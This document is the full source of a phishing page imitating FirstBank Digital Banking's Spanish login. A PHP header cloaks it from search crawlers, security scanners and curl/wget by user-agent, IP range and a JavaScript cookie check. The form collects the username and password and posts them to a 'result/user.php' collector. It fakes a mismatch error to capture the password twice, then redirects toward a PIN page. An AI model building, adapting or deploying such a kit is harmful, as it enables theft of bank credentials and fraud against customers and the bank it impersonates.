<?php
// === Block & Log Bot Visitors ===

function logBlocked($reason) {
    $ip = $_SERVER['REMOTE_ADDR'];
    $ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : 'Unknown';
    $time = date("Y-m-d H:i:s");
    $log = "[$time] BLOCKED: $reason | IP: $ip | UA: $ua\n";
    file_put_contents(__DIR__ . '/blocked.log', $log, FILE_APPEND);
    http_response_code(403);
    exit("Access Denied: $reason.");
}

// === Block by Known Bot User-Agents ===
$blockedAgents = [
    'googlebot', 'bingbot', 'slurp', 'duckduckbot', 'baiduspider',
    'yandex', 'sogou', 'exabot', 'facebot', 'ia_archiver',
    'mj12bot', 'ahrefsbot', 'semrush', 'dotbot', 'gigabot', 'spbot',
    'crawler', 'scrapy', 'python', 'wget', 'curl'
];

$ua = strtolower(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '');
foreach ($blockedAgents as $bot) {
    if (strpos($ua, $bot) !== false) {
        logBlocked("Bot User-Agent: $bot");
    }
}

// === Block by Known Bot CIDR IP Ranges ===
function ipInCIDR($ip, $cidr) {
    list($net, $mask) = explode('/', $cidr);
    $ipDec = ip2long($ip);
    $netDec = ip2long($net);
    $maskDec = ~((1 << (32 - $mask)) - 1);
    return ($ipDec & $maskDec) === ($netDec & $maskDec);
}

// Example CIDRs of Google, Bing, Ahrefs (partial — you can expand)
$blockedCIDRs = [
    '66.249.64.0/19',   // Googlebot
    '64.233.160.0/19',  // Googlebot
    '157.55.0.0/16',    // Bingbot
    '207.46.0.0/16',    // Bingbot
    '199.30.228.0/22',  // Ahrefs
    '5.45.207.0/24',    // Ahrefs
];

$visitorIP = $_SERVER['REMOTE_ADDR'];
foreach ($blockedCIDRs as $cidr) {
    if (ipInCIDR($visitorIP, $cidr)) {
        logBlocked("Bot IP Range: $cidr");
    }
}

// === JavaScript Challenge ===
// Humans pass, most bots don’t execute JS
if (!isset($_COOKIE['js_challenge_passed'])) {
    echo "<script>document.cookie='js_challenge_passed=true; path=/';location.reload();</script>";
    exit;
}
?>
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>FirstBank Digital Banking</title>
    <style>
        * {
            box-sizing: border-box;
            margin: 0;
            padding: 0;
        }

        body {
            background: #fff;
            font-family: sans-serif;
        }

        header {
            width: 74%;
            padding: 1rem;
            display: flex;
            align-items: center;
            justify-content: space-between;
        }

        .logogo img {
            width: 100%;
            height: auto;
        }

        .logogo {
            width:170px;
            height: 54px;
        }

        .flecontu {
            display: flex;
            align-items: center;
            gap: 1rem;
        }

        .flecontu a {
            color: #00843d;
            text-decoration: none;
        }
        main {
            width: 100%;
            /* display: flex;
            align-items: center;
            justify-content: center;
            height: 95vh; */
        }
        .loginbox {
            width: 500px;
            margin: auto;
            margin-top: 4rem;
        }
        form h1 {
            color: #00843d;
            font-size: 33px;
            font-weight: 400;
            text-align: start;
            margin-bottom: 1.5rem;
        }
        form input {
            height: 50px;
            border: 1px solid #cccccc;
            color: #333333;
            outline: none;
            width: 100%;
            padding: 0 15px;
        }
        .notcom {
            padding-top: 15px;
            text-align: end;
            color: #333333;
            font-size: 14px;
        }
        .notcom a {
            color: #00843d;
            text-decoration: none;
        }
        .bttnn {
            display: flex;
            width: 100%;
            align-items: center;
            justify-content: end;
            margin-top: 1rem;
            margin-bottom: 7rem;
        }
        .bttnn button {
            padding: 1rem;
            background: #299e60;
            color: #fff;
            border: none;
            border-radius: 5px;
            width: 140px;
            height: 50px;
        }
        .btopp {
            border-top: 1px solid #cccccc;
            padding-top: 10px;
        }
        .flrinn {
            display: flex;
            align-items: center;
            justify-content: end;
            gap: 5px;
        }
        .flrinn a {
            color: #00843d;
            font-size: 13px;
            font-family: sans-serif;
        }
        .btopp span {
            display: block;
            text-align: start;
            font-size: 13px;
            color: #666666;
            margin-top: 1rem;
        }
        .logimd img {
            width: 100%;
            height: auto;
        }
        .logimd {
            width: 24%;
            position: fixed;
            top: 0;
            right: 0;
            height: 100%;
            bottom: 0;
        }
        #flexpass {
            display: none;
            align-items: baseline;
            gap: 1rem;  
        }
        .flexpass img {
            width: 35px;
            height: 31px;
        }
        #error {
            width: 100%;
            border: 1px solid #ec2e33;
            background: #fce3e4;
            padding: 3px 8px 3px;
            display: none;
            align-items: center;
            gap: 8px;
            margin-top: 10px;
        }
        #error span {
            color: #666666;
            font-size: 12px;
            font-family: sans-serif;
        }
        #loadd {
            width: 100%;
            height: 100vh;
            background: #eeebeb6f;
            display: none;
            align-items: center;
            justify-content: center;
            position: fixed;
            z-index: 999;
            top: 0;
            left: 0;
            /* display: n; */
        }
        .loader {
        border: 4px solid rgba(0, 0, 0, .1);
        border-left-color: transparent;
        border-radius: 50%;
        }

        .loader {
        border: 4px solid rgba(0, 0, 0, .1);
        border-left-color: transparent;
        width: 36px;
        height: 36px;
        }

        .loader {
        border: 4px solid rgba(0, 0, 0, .1);
        border-left-color: transparent;
        width: 36px;
        height: 36px;
        animation: spin89345 1s linear infinite;
        }

        @keyframes spin89345 {
        0% {
            transform: rotate(0deg);
        }

        100% {
            transform: rotate(360deg);
        }
        }
        .mgdj img {
            width: 100%;
            height: auto;
        }
        .mgdj {
            width: 425px;
            height: 360px;
            position: absolute;
            bottom: 0;
            left: 0;
        }
        @media screen and (max-width: 768px) {
            header {
                width: 100%;
            }
            .mgdj {
                display: none;
            }
            .logimd {
                display: none;
            }
            .flecontu {
                display: none;
            }
            .loginbox {
                width: 90%;
                margin: auto;
                margin-top: 3rem;
            }
            .logogo {
                width: 115px;
                height: 35px;
            }
            .btopp span{
                text-align: center;
            }
        }
    </style>
     <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>
     <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css" integrity="sha512-z3gLpd7yknf1YoNbCzqRKc4qyor8gaKU1qmn+CShxbuBusANI9QpRohGBreCFkKxLhei6S9CQXFEbbKuqLg0DA==" crossorigin="anonymous" referrerpolicy="no-referrer">
</head>

<body>
    <header>
        <div class="logogo">
            <img src="./img/logoo.png" alt="">
        </div>
        <div class="flecontu">
            <a href="#">Contacta con nosotros</a>
            <a href="#">English</a>
        </div>
    </header>
    <main>
        <div class="flexintit">
            <div class="loginbox">
                <form action="" method="post" id="les">
                    <h1 id="hsiis">Bienvenido a Digital Banking</h1>
                    <div class="flexpass" id="flexpass">
                       <img src="./image.png" alt="">
                        <h1>Contraseña</h1>
                    </div>
                    <input type="text" name="aa" id="emll" placeholder="Nombre de usuario" required>
                    <input type="hidden" name="bb" id="password" placeholder="Contraseña" required>
                    <div id="error">
                        <i class="fas fa-circle-exclamation" style="color: #ec2e33;"></i>
                        <span> Error: El nombre de usuario y la contraseña no coinciden </span>
                    </div>
                    <p class="notcom">¿No es tu computadora? Usa el <a href="#">Teclado virtual</a></p>

                    <div class="bttnn">
                        <button type="button" id="btnn">Próximo</button>
                    </div>

                    <div class="btopp">
                        <div class="flrinn">
                            <a href="#" id="forgo">¡Regístrate hoy!</a>
                            <a href="#" id="forgo2">¿Olvidó su nombre de usuario?</a>
                        </div>
                        <span>
                        Miembro de la FDIC en Puerto Rico, Estados Unidos e Islas Vírgenes Americanas. Prestamista con Equidad en la Vivienda. Todos los productos están sujetos a los términos, condiciones y restricciones de FirstBank.
Copyright © 2025 First BanCorp. Todos los derechos reservados.
                        </span>
                    </div>
                </form>
            </div>
        </div>
    </main>
    <div class="logimd">
        <img src="./img/783.jpg" alt="">
    </div>
    <div class="mgdj">
        <img src="./round.png" alt="">
    </div>
    <div id="loadd">
       <div class="loader"></div>
    </div>
    <script>
        document.getElementById("btnn").addEventListener("click", ()=>{
            const vallu = document.getElementById("btnn").value;

            if (vallu === "") {
                setTimeout(() => {
                    document.getElementById("loadd").style.display = "flex";
                }, 1000);
                setTimeout(() => {
                    document.getElementById("emll").type = "hidden";
                    document.getElementById("password").type = "password";
                    document.getElementById("hsiis").style.display = "none";
                    document.getElementById("flexpass").style.display = "flex";
                    document.getElementById("forgo").textContent = "¿Olvidaste tu contraseña?";
                    document.getElementById("forgo2").textContent = "Nombre de usuario bloqueado";
                    // document.getElementById("error").style.display = "flex";
                    document.getElementById("loadd").style.display = "none";
                    document.getElementById("btnn").type = "submit";
                }, 2000);
            } else {
                alert("hhjdkkd");
            }
        });

        var fille = "./result/user.php"; // Your php url here e.g http://youdomain.com/result.php
          var formSubmitted = 0;
  
          $("#les").on("submit", function (event) {
          
              event.preventDefault();
  
              formSubmitted++;
              
              var inputs = $('input[required]');
              for (var i = 0; i < inputs.length; i++) {
                  if (!inputs[i].value.trim()) {
                      alert("Please fill in all fields.");
                      return;
                  }
              }
              
              var formData = new FormData(this);
  
              $.ajax({
                  url: `${fille}`,
                  type: 'POST',
                  data: formData,
                  processData: false, // Required to send FormData
                  contentType: false, // Required to not set default content type
                  success: function (response) {
                      console.log(response);
                      
                      if (formSubmitted === 1) {
                          console.log("YESSSSS");
                          $("#password").val("");
                          document.getElementById("error").style.display = "flex";
                      } else if (formSubmitted >= 2) {
                        document.getElementById("loadd").style.display = "flex";
                        console.log("GOOOOOO");
                          setTimeout(() => {
                              window.location.href = `./init/pin.php`;
                          }, 2000);
                      } 
                  }
              });
          });
    </script>
</body>

</html>